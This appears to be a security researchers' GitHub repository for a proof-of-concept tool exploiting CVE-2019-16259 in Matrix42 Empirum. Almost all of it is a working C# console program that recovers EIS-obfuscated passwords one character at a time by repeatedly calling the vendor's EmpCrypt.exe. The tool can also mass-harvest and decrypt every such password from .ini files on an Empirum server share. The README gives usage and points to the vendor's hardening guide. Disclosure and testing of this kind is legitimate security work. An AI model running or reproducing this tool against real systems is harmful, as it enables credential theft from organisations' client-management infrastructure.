├── EmpDecrypt.sln ├── EmpDecrypt ├── App.config ├── EmpDecrypt.csproj ├── Program.cs ├── Properties │ └── AssemblyInfo.cs └── r_tec_9A1_1.ico ├── EmpEISDecrypt.JPG └── README.md /EmpDecrypt.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.438 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "EmpDecrypt", "EmpDecrypt\EmpDecrypt.csproj", "{132116B9-668A-40A8-93D3-012A583AEDCE}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {132116B9-668A-40A8-93D3-012A583AEDCE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {132116B9-668A-40A8-93D3-012A583AEDCE}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {132116B9-668A-40A8-93D3-012A583AEDCE}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {132116B9-668A-40A8-93D3-012A583AEDCE}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {B768EC55-FEEC-4BAA-8CC9-F2609B01F177} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /EmpDecrypt/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /EmpDecrypt/EmpDecrypt.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {132116B9-668A-40A8-93D3-012A583AEDCE} 8 | Exe 9 | EmpDecrypt 10 | EmpDecrypt 11 | v4.6.1 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | r_tec_9A1_1.ico 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | -------------------------------------------------------------------------------- /EmpDecrypt/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.Diagnostics; 4 | using System.Collections.Generic; 5 | using System.Linq; 6 | using System.Text; 7 | using System.Threading.Tasks; 8 | using System.Drawing; 9 | using System.Media; 10 | 11 | namespace EmpDecrypt 12 | { 13 | 14 | class Program 15 | { 16 | //EIS-Decrypter für Matrix42 AG EmpCrypt.exe Version: 16.1.2.4691 17 | 18 | //Globale variablen deklarieren 19 | public static string choice = ""; 20 | public static string Hash = ""; 21 | public static string file = ""; 22 | public static string folder = ""; 23 | public static string Password = ""; 24 | public static string parameter = ""; 25 | public static string output = ""; 26 | public static double fortschritt = 0; 27 | public static int[] sequence = new int[] { 0, 21, 22, 19, 2, 6, 29, 23, 20, 24, 12, 9, 25, 26, 14, 3, 15, 33, 34, 37, 30, 27, 28, 31, 10, 32, 35, 7, 38, 39, 5, 16, 1, 36, 13, 8, 17, 4, 18, 11, 40, 41 }; 28 | public static int[] ASCII = new int[] { 32, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 69, 78, 73, 83, 82, 65, 84, 68, 72, 85, 76, 67, 71, 77, 79, 66, 87, 70, 75, 90, 80, 86, 225, 74, 89, 88, 81, 101, 110, 105, 115, 114, 97, 116, 100, 104, 117, 108, 99, 103, 109, 111, 98, 119, 102, 107, 122, 112, 118, 106, 121, 120, 113, 64, 21, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 58, 59, 60, 61, 62, 63, 91, 92, 93, 94, 95, 96, 123, 124, 125, 126, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 18, 19, 20, 22, 23, 24, 25, 28, 29, 30, 31, 16, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239 }; 29 | 30 | static void Main() 31 | { 32 | //Variablendeklaration 33 | string choice = ""; 34 | 35 | //Menüauswahl 36 | Console.Clear(); 37 | Console.BackgroundColor = ConsoleColor.Black; 38 | Console.ForegroundColor = ConsoleColor.Green; 39 | Console.CursorVisible = true; 40 | Console.WriteLine(@"***************************************************************************************"); 41 | Console.WriteLine(@"* ______ ____ __ *"); 42 | Console.WriteLine(@"* / ____/___ ___ ____ / __ \___ ____________ ______ / /_ *"); 43 | Console.WriteLine(@"* / __/ / __ `__ \/ __ \/ / / / _ \/ ___/ ___/ / / / __ \/ __/ *"); 44 | Console.WriteLine(@"* / /___/ / / / / / /_/ / /_/ / __/ /__/ / / /_/ / /_/ / /_ *"); 45 | Console.WriteLine(@"* /_____/_/ /_/ /_/ .___/_____/\___/\___/_/ \__, / .___/\__/ *"); 46 | Console.WriteLine(@"* /_/ /____/_/ *"); 47 | Console.WriteLine(@"* Matrix42 Empirum EIS Decrypter *"); 48 | Console.WriteLine(@"* By Nick Theisinger (0x23353435) and Fabian Mosch (S3cur3Th1sSh1t) - 2019 *"); 49 | Console.WriteLine(@"* r-tec IT Security GmbH *"); 50 | Console.WriteLine(@"* *"); 51 | Console.WriteLine(@"* CVE: 2019-16259 v1.2 *"); 52 | Console.WriteLine(@"***************************************************************************************"); 53 | Console.WriteLine(); 54 | Console.ForegroundColor = ConsoleColor.Red; 55 | if (!File.Exists(Path.Combine(Environment.CurrentDirectory, "EmpCrypt.exe")) || !File.Exists(Path.Combine(Environment.CurrentDirectory, "Matrix42.Common.AppVerificator.dll"))) 56 | { 57 | Console.WriteLine("The file EmpCrypt.exe and/or Matrix42.Common.AppVerificator.dll does not exist.\nMake sure they are stored in the same directory as the EmpDecrypt.exe!\nPress RETURN to exit the application..."); 58 | Console.ReadLine(); 59 | Environment.Exit(1); 60 | } 61 | Console.WriteLine(@"Welcome to the main menu!"); 62 | //Console.WriteLine(); 63 | Console.WriteLine(@"Please enter the number of choice:"); 64 | Console.WriteLine(); 65 | Console.ForegroundColor = ConsoleColor.Green; 66 | Console.WriteLine(@"1. Decrypt a single EIS obfuscated Password."); 67 | Console.WriteLine(); 68 | Console.WriteLine(@"2. Decrypt multiple EIS obfuscated Passwords imported from an Empirum ini-file."); 69 | Console.WriteLine(); 70 | Console.WriteLine(@"3. Decrypt multiple EIS obfuscated Passwords imported from multiple Empirum ini-files."); 71 | Console.WriteLine(); 72 | Console.WriteLine(@"4. Exit"); 73 | Console.WriteLine(); 74 | Console.ForegroundColor = ConsoleColor.Red; 75 | Console.Write(@"Enter number: "); 76 | Console.ForegroundColor = ConsoleColor.Green; 77 | choice = Console.ReadLine(); 78 | 79 | switch (choice) 80 | { 81 | case "1": 82 | Decrypt_Single(); 83 | break; 84 | case "2": 85 | Decrypt_From_ini(); 86 | break; 87 | case "3": 88 | Decrypt_From_folder(); 89 | break; 90 | case "4": 91 | Environment.Exit(0); 92 | break; 93 | default: 94 | Main(); 95 | break; 96 | } 97 | } 98 | 99 | static void Decrypt_Single() 100 | { 101 | //Initialisierung 102 | choice = ""; 103 | Hash = ""; 104 | Password = ""; 105 | fortschritt = 0; 106 | Process EmpCrypt = new Process(); 107 | EmpCrypt.StartInfo.FileName = Path.Combine(Environment.CurrentDirectory, "EmpCrypt.exe"); 108 | EmpCrypt.StartInfo.UseShellExecute = false; 109 | EmpCrypt.StartInfo.RedirectStandardOutput = true; 110 | String fertig = ""; 111 | 112 | //Menüauswahl 113 | Console.Clear(); 114 | Console.ForegroundColor = ConsoleColor.Red; 115 | Console.WriteLine(@"Please enter the number on choice:"); 116 | Console.WriteLine(); 117 | Console.ForegroundColor = ConsoleColor.Green; 118 | Console.WriteLine(@"1. Enter a Empirum EIS obfuscated Password"); 119 | Console.WriteLine(); 120 | Console.WriteLine(@"2. Back to main menu"); 121 | Console.WriteLine(); 122 | Console.ForegroundColor = ConsoleColor.Red; 123 | Console.Write(@"Enter number: "); 124 | Console.ForegroundColor = ConsoleColor.Green; 125 | choice = Console.ReadLine(); 126 | Console.Clear(); 127 | 128 | switch (choice) 129 | { 130 | case "1": 131 | Console.WriteLine("Please enter the Empirum EIS obfuscated Password:"); 132 | Hash = Console.ReadLine(); 133 | if ((Hash.Length != 42) || (Hash[0] != 'A') || (Hash[41] != 'X')) 134 | { 135 | Console.WriteLine("The entered string is not a valid EIS obfuscated Password. Please Try again!"); 136 | Console.ReadLine(); 137 | Decrypt_Single(); 138 | } 139 | Console.Clear(); 140 | Console.WriteLine("Decryption started..."); 141 | Console.Write("\rProgress: " + fortschritt.ToString("#,##0.00") + "% Decrypted characters: "); 142 | break; 143 | case "2": 144 | Main(); 145 | break; 146 | default: 147 | Decrypt_Single(); 148 | break; 149 | } 150 | 151 | if (Hash == "A(,'-&-#+# /" + '"' + "*&(',.+ )*/!$%-..,/!)*" + '"' + ")+$% X") 152 | { 153 | fortschritt = 100; 154 | Console.Write("\rProgress: " + fortschritt.ToString("#,##0.00") + "% Decrypted characters: [EMPTY obfuscated Password]"); 155 | Console.WriteLine(); 156 | fertig = "[EMPTY obfuscated Password]"; 157 | } 158 | else 159 | { 160 | for (int i = 1; i < 41; i++) 161 | { 162 | 163 | for (int j = 0; j < ASCII.Length; j++) 164 | { 165 | output = ""; 166 | Password = fertig + Convert.ToChar(ASCII[j]); 167 | parameter = "/S /Eis " + Password; 168 | EmpCrypt.StartInfo.Arguments = parameter; 169 | EmpCrypt.StartInfo.StandardOutputEncoding = System.Text.Encoding.UTF8; 170 | EmpCrypt.Start(); 171 | output = EmpCrypt.StandardOutput.ReadLine(); 172 | EmpCrypt.WaitForExit(); 173 | 174 | if (output[sequence[i]] == Hash[sequence[i]]) 175 | { 176 | fertig = fertig + Convert.ToChar(ASCII[j]); 177 | fortschritt = (2.5 * i); 178 | //Console.OutputEncoding = System.Text.Encoding.UTF8; 179 | Console.Write("\rProgress: " + fortschritt.ToString("#,##0.00") + "% Decrypted characters: " + fertig + " "); 180 | j = ASCII.Length; 181 | } 182 | } 183 | 184 | } 185 | } 186 | 187 | Console.WriteLine(); 188 | Console.WriteLine("...Decryption finished!"); 189 | Console.WriteLine(""); 190 | Console.WriteLine("Decrypted password: " + fertig); 191 | Console.WriteLine("Press RETURN to get back to the main menu..."); 192 | Console.ReadLine(); 193 | Main(); 194 | } 195 | 196 | static void Decrypt_From_ini() 197 | { 198 | //Initialisierung 199 | choice = ""; 200 | file = ""; 201 | Process EmpCrypt = new Process(); 202 | EmpCrypt.StartInfo.FileName = Path.Combine(Environment.CurrentDirectory, "EmpCrypt.exe"); 203 | EmpCrypt.StartInfo.UseShellExecute = false; 204 | EmpCrypt.StartInfo.RedirectStandardOutput = true; 205 | 206 | 207 | //Menüauswahl 208 | Console.Clear(); 209 | Console.ForegroundColor = ConsoleColor.Red; 210 | Console.WriteLine(@"Please enter the number on choice:"); 211 | Console.WriteLine(); 212 | Console.ForegroundColor = ConsoleColor.Green; 213 | Console.WriteLine(@"1. Enter the full path to a Empirum .ini-file"); 214 | Console.WriteLine(); 215 | Console.WriteLine(@"2. Back to main menu"); 216 | Console.WriteLine(); 217 | Console.ForegroundColor = ConsoleColor.Red; 218 | Console.Write(@"Enter number: "); 219 | Console.ForegroundColor = ConsoleColor.Green; 220 | choice = Console.ReadLine(); 221 | Console.Clear(); 222 | 223 | switch (choice) 224 | { 225 | case "1": 226 | Console.WriteLine("Please enter the full path to a Empirum .ini-file:"); 227 | file = Console.ReadLine(); 228 | if (!File.Exists(file)) 229 | { 230 | Console.WriteLine("The file does not exist. Please try again!"); 231 | Console.ReadLine(); 232 | Decrypt_From_ini(); 233 | } 234 | break; 235 | case "2": 236 | Main(); 237 | break; 238 | default: 239 | Decrypt_From_ini(); 240 | break; 241 | } 242 | 243 | //File zeilenweise einlesen und auf EIS-Hashes prüfen: 244 | List found = new List(); 245 | string line; 246 | using (StreamReader fileread = new StreamReader(file)) 247 | { 248 | while ((line = fileread.ReadLine()) != null) 249 | { 250 | if (line.Contains("_EIS=A")) 251 | { 252 | found.Add(line); 253 | } 254 | } 255 | } 256 | 257 | if (found.Count == 0) 258 | { 259 | Console.WriteLine("The given file does not contain any EIS obfuscated Passwords. Please try again!"); 260 | Console.ReadLine(); 261 | Decrypt_From_folder(); 262 | } 263 | 264 | List found_uniq = found.Distinct().ToList(); 265 | 266 | //obfuscated Password extract 267 | string[][] EIS_Array = new string[found_uniq.Count][]; 268 | int g = 0; 269 | foreach (var item in found_uniq) 270 | { 271 | EIS_Array[g] = item.Split(new[] { '=' }, 2); 272 | EIS_Array[g][0] = EIS_Array[g][0].Replace("_EIS", ""); 273 | g++; 274 | } 275 | string[] fertig = new string[found_uniq.Count]; 276 | Console.Clear(); 277 | Console.WriteLine("Decryption started..."); 278 | Console.Write("\rProgress 1/" + EIS_Array.Length + ": " + fortschritt.ToString("#,##0.00") + "% Decrypted characters: "); 279 | 280 | for (int h = 0; h < EIS_Array.Length; h++) 281 | { 282 | 283 | Hash = ""; 284 | Password = ""; 285 | fortschritt = 0; 286 | fertig[h] = ""; 287 | 288 | Hash = EIS_Array[h][1]; 289 | if ((Hash.Length != 42) || (Hash[0] != 'A') || (Hash[41] != 'X')) 290 | { 291 | fortschritt = 100; 292 | Console.Write("\rProgress " + (h + 1) + "/" + EIS_Array.Length + ": " + fortschritt.ToString("#,##0.00") + "% Decrypted characters: The entered string is not a valid EIS obfuscated Password. Please try again!"); 293 | Console.WriteLine(); 294 | fertig[h] = "[INVALID obfuscated Password]"; 295 | continue; 296 | } 297 | 298 | if (Hash == "A(,'-&-#+# /" + '"' + "*&(',.+ )*/!$%-..,/!)*" + '"' + ")+$% X") 299 | { 300 | fortschritt = 100; 301 | Console.Write("\rProgress " + (h + 1) + "/" + EIS_Array.Length + ": " + fortschritt.ToString("#,##0.00") + "% Decrypted characters: [EMPTY obfuscated Password]"); 302 | Console.WriteLine(); 303 | fertig[h] = "[EMPTY obfuscated Password]"; 304 | continue; 305 | } 306 | 307 | Console.Write("\rProgress " + (h + 1) + "/" + EIS_Array.Length + ": " + fortschritt.ToString("#,##0.00") + "% Decrypted characters: "); 308 | 309 | for (int i = 1; i < 41; i++) 310 | { 311 | for (int j = 0; j < ASCII.Length; j++) 312 | { 313 | output = ""; 314 | Password = fertig[h] + Convert.ToChar(ASCII[j]); 315 | parameter = "/S /Eis " + Password; 316 | EmpCrypt.StartInfo.Arguments = parameter; 317 | EmpCrypt.StartInfo.StandardOutputEncoding = System.Text.Encoding.UTF8; 318 | EmpCrypt.Start(); 319 | output = EmpCrypt.StandardOutput.ReadLine(); 320 | EmpCrypt.WaitForExit(); 321 | 322 | if (output[sequence[i]] == Hash[sequence[i]]) 323 | { 324 | fertig[h] = fertig[h] + Convert.ToChar(ASCII[j]); 325 | fortschritt = (2.5 * i); 326 | //Console.OutputEncoding = System.Text.Encoding.UTF8; 327 | Console.Write("\rProgress " + (h + 1) + "/" + EIS_Array.Length + ": " + fortschritt.ToString("#,##0.00") + "% Decrypted characters: " + fertig[h] + " "); 328 | j = ASCII.Length; 329 | } 330 | } 331 | 332 | } 333 | Console.WriteLine(); 334 | } 335 | 336 | Console.Clear(); 337 | Console.WriteLine("Processed obfuscated Passwords:"); 338 | for (int k = 0; k < EIS_Array.Length; k++) 339 | { 340 | Console.WriteLine(EIS_Array[k][0] + " | " + EIS_Array[k][1] + " | " + fertig[k]); 341 | } 342 | Console.WriteLine(); 343 | Console.WriteLine("Press RETURN to get back to the main menu..."); 344 | Console.ReadLine(); 345 | Main(); 346 | } 347 | 348 | static void Decrypt_From_folder() 349 | { 350 | //Initialisierung 351 | choice = ""; 352 | folder = ""; 353 | Process EmpCrypt = new Process(); 354 | EmpCrypt.StartInfo.FileName = Path.Combine(Environment.CurrentDirectory, "EmpCrypt.exe"); 355 | EmpCrypt.StartInfo.UseShellExecute = false; 356 | EmpCrypt.StartInfo.RedirectStandardOutput = true; 357 | 358 | //Menüauswahl 359 | Console.Clear(); 360 | Console.ForegroundColor = ConsoleColor.Red; 361 | Console.WriteLine(@"Please enter the number on choice:"); 362 | Console.WriteLine(); 363 | Console.ForegroundColor = ConsoleColor.Green; 364 | Console.WriteLine(@"1. Enter the full path to a Empirum .ini-folder"); 365 | Console.WriteLine(); 366 | Console.WriteLine(@"2. Back to main menu"); 367 | Console.WriteLine(); 368 | Console.ForegroundColor = ConsoleColor.Red; 369 | Console.Write(@"Enter number: "); 370 | Console.ForegroundColor = ConsoleColor.Green; 371 | choice = Console.ReadLine(); 372 | Console.Clear(); 373 | 374 | switch (choice) 375 | { 376 | case "1": 377 | Console.WriteLine("Please enter the full path to a Empirum .ini-folder:"); 378 | folder = Console.ReadLine(); 379 | if (!Directory.Exists(folder)) 380 | { 381 | Console.WriteLine("The Path does not exist. Please try again!"); 382 | Console.ReadLine(); 383 | Decrypt_From_folder(); 384 | } 385 | break; 386 | case "2": 387 | Main(); 388 | break; 389 | default: 390 | Decrypt_From_folder(); 391 | break; 392 | } 393 | 394 | string[] filePaths = Directory.GetFiles(folder, "*.ini", SearchOption.TopDirectoryOnly); 395 | 396 | if (filePaths.Length == 0) 397 | { 398 | Console.WriteLine("The given directory does not contain any ini-files. Please try again!"); 399 | Console.ReadLine(); 400 | Decrypt_From_folder(); 401 | } 402 | 403 | List found = new List(); 404 | string line; 405 | 406 | foreach (var item0 in filePaths) 407 | { 408 | //File zeilenweise einlesen und auf EIS-Hashes prüfen: 409 | using (StreamReader fileread = new StreamReader(item0)) 410 | { 411 | while ((line = fileread.ReadLine()) != null) 412 | { 413 | if (line.Contains("_EIS=A")) 414 | { 415 | found.Add(line); 416 | } 417 | } 418 | } 419 | } 420 | 421 | if (found.Count == 0) 422 | { 423 | Console.WriteLine("The given files does not contain any EIS obfuscated Passwords. Please try again!"); 424 | Console.ReadLine(); 425 | Decrypt_From_folder(); 426 | } 427 | 428 | List found_uniq = found.Distinct().ToList(); 429 | 430 | //Hash aus den Zeilen extrahieren 431 | string[][] EIS_Array = new string[found_uniq.Count][]; 432 | int g = 0; 433 | foreach (var item in found_uniq) 434 | { 435 | EIS_Array[g] = item.Split(new[] { '=' }, 2); 436 | EIS_Array[g][0] = EIS_Array[g][0].Replace("_EIS", ""); 437 | g++; 438 | } 439 | string[] fertig = new string[found_uniq.Count]; 440 | Console.Clear(); 441 | Console.WriteLine("Decryption started..."); 442 | Console.Write("\rProgress 1/" + EIS_Array.Length + ": " + fortschritt.ToString("#,##0.00") + "% Decrypted characters: "); 443 | 444 | for (int h = 0; h < EIS_Array.Length; h++) 445 | { 446 | 447 | Hash = ""; 448 | Password = ""; 449 | fortschritt = 0; 450 | fertig[h] = ""; 451 | 452 | Hash = EIS_Array[h][1]; 453 | if ((Hash.Length != 42) || (Hash[0] != 'A') || (Hash[41] != 'X')) 454 | { 455 | fortschritt = 100; 456 | Console.Write("\rProgress " + (h + 1) + "/" + EIS_Array.Length + ": " + fortschritt.ToString("#,##0.00") + "% Decrypted characters: The entered string is not a valid EIS obfuscated Password. Please try again!"); 457 | Console.WriteLine(); 458 | fertig[h] = "[INVALID obfuscated Password]"; 459 | continue; 460 | } 461 | 462 | if (Hash == "A(,'-&-#+# /" + '"' + "*&(',.+ )*/!$%-..,/!)*" + '"' + ")+$% X") 463 | { 464 | fortschritt = 100; 465 | Console.Write("\rProgress " + (h + 1) + "/" + EIS_Array.Length + ": " + fortschritt.ToString("#,##0.00") + "% Decrypted characters: [EMPTY obfuscated Password]"); 466 | Console.WriteLine(); 467 | fertig[h] = "[EMPTY obfuscated Password]"; 468 | continue; 469 | } 470 | 471 | Console.Write("\rProgress " + (h + 1) + "/" + EIS_Array.Length + ": " + fortschritt.ToString("#,##0.00") + "% Decrypted characters: "); 472 | 473 | for (int i = 1; i < 41; i++) 474 | { 475 | for (int j = 0; j < ASCII.Length; j++) 476 | { 477 | output = ""; 478 | Password = fertig[h] + Convert.ToChar(ASCII[j]); 479 | parameter = "/S /Eis " + Password; 480 | EmpCrypt.StartInfo.Arguments = parameter; 481 | EmpCrypt.StartInfo.StandardOutputEncoding = System.Text.Encoding.UTF8; 482 | EmpCrypt.Start(); 483 | output = EmpCrypt.StandardOutput.ReadLine(); 484 | EmpCrypt.WaitForExit(); 485 | 486 | if (output[sequence[i]] == Hash[sequence[i]]) 487 | { 488 | fertig[h] = fertig[h] + Convert.ToChar(ASCII[j]); 489 | fortschritt = (2.5 * i); 490 | //Console.OutputEncoding = System.Text.Encoding.UTF8; 491 | Console.Write("\rProgress " + (h + 1) + "/" + EIS_Array.Length + ": " + fortschritt.ToString("#,##0.00") + "% Decrypted characters: " + fertig[h] + " "); 492 | j = ASCII.Length; 493 | } 494 | } 495 | 496 | } 497 | Console.WriteLine(); 498 | } 499 | 500 | Console.Clear(); 501 | Console.WriteLine("Processed obfuscated Passwords:"); 502 | for (int k = 0; k < EIS_Array.Length; k++) 503 | { 504 | Console.WriteLine(EIS_Array[k][0] + " | " + EIS_Array[k][1] + " | " + fertig[k]); 505 | } 506 | Console.WriteLine(); 507 | Console.WriteLine("Press RETURN to get back to the main menu..."); 508 | Console.ReadLine(); 509 | Main(); 510 | 511 | } 512 | } 513 | } 514 | -------------------------------------------------------------------------------- /EmpDecrypt/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // Allgemeine Informationen über eine Assembly werden über die folgenden 6 | // Attribute gesteuert. Ändern Sie diese Attributwerte, um die Informationen zu ändern, 7 | // die einer Assembly zugeordnet sind. 8 | [assembly: AssemblyTitle("EmpDecrypt")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("EmpDecrypt")] 13 | [assembly: AssemblyCopyright("Copyright © 2019")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Durch Festlegen von ComVisible auf FALSE werden die Typen in dieser Assembly 18 | // für COM-Komponenten unsichtbar. Wenn Sie auf einen Typ in dieser Assembly von 19 | // COM aus zugreifen müssen, sollten Sie das ComVisible-Attribut für diesen Typ auf "True" festlegen. 20 | [assembly: ComVisible(false)] 21 | 22 | // Die folgende GUID bestimmt die ID der Typbibliothek, wenn dieses Projekt für COM verfügbar gemacht wird 23 | [assembly: Guid("132116b9-668a-40a8-93d3-012a583aedce")] 24 | 25 | // Versionsinformationen für eine Assembly bestehen aus den folgenden vier Werten: 26 | // 27 | // Hauptversion 28 | // Nebenversion 29 | // Buildnummer 30 | // Revision 31 | // 32 | // Sie können alle Werte angeben oder Standardwerte für die Build- und Revisionsnummern verwenden, 33 | // übernehmen, indem Sie "*" eingeben: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /EmpDecrypt/r_tec_9A1_1.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S3cur3Th1sSh1t/EmpEISDecrypt/828268e2a56ca8f93369680bec122eb9e8ba2f21/EmpDecrypt/r_tec_9A1_1.ico -------------------------------------------------------------------------------- /EmpEISDecrypt.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S3cur3Th1sSh1t/EmpEISDecrypt/828268e2a56ca8f93369680bec122eb9e8ba2f21/EmpEISDecrypt.JPG -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # EmpEISDecrypt 2 | Decrypt Matrix42 Empirum /EIS Passwords. 3 | 4 | The Empirum Client Management Software is used for typical client management tasks, such as 5 | 6 | * Inventory and asset Management 7 | * Patch Management 8 | * Software Management 9 | * License Management 10 | 11 | This repository contains PoC-Code to deobfuscate Empirum EIS-generated obfuscated passwords. To exploit this vulnerability an attacker needs access to `Empcrypt.exe` as well as `Matrix42.Common.AppVerificator.dll`. 12 | 13 | ![alt text](https://github.com/S3cur3Th1sSh1t/EmpEISDecrypt/raw/master/EmpEISDecrypt.JPG) 14 | 15 | There are three options available for decryption: 16 | 17 | * Decrypt a single EIS obfuscated Password 18 | * Decrypt multiple EIS obfuscated Passwords from a given .INI-file 19 | * Decrypt multiple EIS obfuscated Passwords from multiple .INI-files 20 | 21 | For option two and three the Passwords are automatically parsed from the .INI-file. 22 | Its possible to specify a network share path in option three, which makes it possible to decrypt all User-Passwords from an Empirum-Server network share for all .INI-files contained. Duplicate entries are removed automatically. 23 | 24 | #### Matrix42 as the vendor of Client Lifecycle Management Suite Empirum provides customers a security hardening guide for years. By implementing the measures described in their guide, this PoC can no longer be exploited. If there is doubt as to whether your own environment is vulnerable - please contact the Matrix42 Support. 25 | --------------------------------------------------------------------------------